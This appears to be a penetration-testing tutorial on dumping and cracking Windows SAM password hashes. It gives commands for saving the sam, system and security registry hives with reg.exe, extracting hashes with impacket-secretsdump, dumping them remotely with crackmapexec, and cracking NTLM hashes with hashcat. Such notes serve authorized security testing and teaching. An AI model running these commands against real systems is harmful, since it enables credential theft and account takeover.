Skip to content

Attacking SAM

The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system containing user names and passwords.

Locations

The files that are relevant for the SAM are placed in the Windows Registry.

Registry Hive Description
hklm\sam Contains the hashes associated with local account passwords.
hklm\system Contains the system bootkey, which is used to encrypt the SAM database.
hklm\security Contains cached credentials for domain accounts.

Copy Registry hives with reg.exe

To copy the SAM database you need to have at least local administrator privilege.

  1. Use reg.exe to save hklm\sam.
reg.exe save hklm\sam C:\sam.save

2. Use reg.exe to save hklm\system.

reg.exe save hklm\system C:\system.save

3. 1. Use reg.exe to save hklm\security.

reg.exe save hklm\security C:\security.save

Dumping hashes with secretsdump

Note

The boot key is mandatory. Dumping those hashes without the boot key is not possible, because the boot key is used to encrypt & decrypt the SAM database.

Copy the files to the attacking machine and start cracking with secretsdump. The hashes are encrypted with the bootkey which is located in the hklm\system hive. Without the bootkey, the password cannot be decrypted.

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

The hashes are being dunped in the following format:

uid:rid:lmhash:nthash

Dumping SAM remotely

The hashes from the SAM database can also be dumped remotely with crackmapexec. The variables $ip, $username, and $password needs to be replaces with the actual values. You need at least to have credentials that have local admin privileges to the victim machine.

crackmapexec smb $ip --local-auth -u $username -p $password --lsa

Cracking hashes with hascat

After dumping the hashes, hashcat can be used to crack the hashes to reveal the plain-text passwords.

sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
  • -m 1000 => Set hashtype to NTLM hashes.